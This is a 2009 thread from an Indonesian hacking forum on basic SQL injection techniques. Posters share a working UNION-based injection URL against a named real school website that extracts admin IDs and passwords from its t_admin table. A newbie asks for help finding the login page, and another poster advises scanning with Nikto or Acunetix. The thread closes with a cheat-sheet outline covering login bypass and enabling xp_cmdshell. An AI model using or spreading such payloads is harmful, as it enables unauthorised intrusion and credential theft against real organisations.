Re: TEknIk MEndasar Sql Injection Season 1
Posted: Sat Jul 04, 2009 9:28 pm
ijin nyobain kak!
The largest cyber security forum in Indonesia with more than 129000 members
http://xcode.or.id/forum/
Code: Select all
http://www.sman1karangnongko-klt.sch.id/berita.php?ID=-31+union+all+select+1,2,3,group_concat(fs_id,0x3a,fs_password,0x3a,fs_kat),5,6,7,8,9,10+from+t_admin--
Coba pake nikto atau acunetix bro cara cari login pagenya...vodork wrote:numpang corat coret di siani ya om
daripada bikin tpik baru malah nyampah
belum nemu'n halaman loginnyaCode: Select all
http://www.sman1karangnongko-klt.sch.id/berita.php?ID=-31+union+all+select+1,2,3,group_concat(fs_id,0x3a,fs_password,0x3a,fs_kat),5,6,7,8,9,10+from+t_admin--
udah tak ubek2 gak nemu'n juga
ada yang bisa?
mohon bimbinganya....
aku masih newbie...
thax b4...
Code: Select all
[size=150][b]Table Of Contents[/b][/size]
1. About SQL Injection Cheat Sheet
2. Syntax Reference, Sample Attacks and Dirty SQL Injection Tricks
1. Line Comments
* SQL Injection Attack Samples
2. Inline Comments
* Classical Inline Comment SQL Injection Attack Samples
* MySQL Version Detection Sample Attacks
3. Stacking Queries
* Language / Database Stacked Query Support Table
* About MySQL and PHP
* Stacked SQL Injection Attack Samples
4. If Statements
* MySQL If Statement
* SQL Server If Statement
* If Statement SQL Injection Attack Samples
5. Using Integers
6. String Operations
* String Concatenation
7. Strings without Quotes
* Hex based SQL Injection Samples
8. String Modification & Related
9. Union Injections
* UNION – Fixing Language Issues
10. Bypassing Login Screens
11. Enabling xp_cmdshell in SQL Server 2005
12. Other parts are not so well formatted but check out by yourself, drafts, notes and stuff, scroll down and see.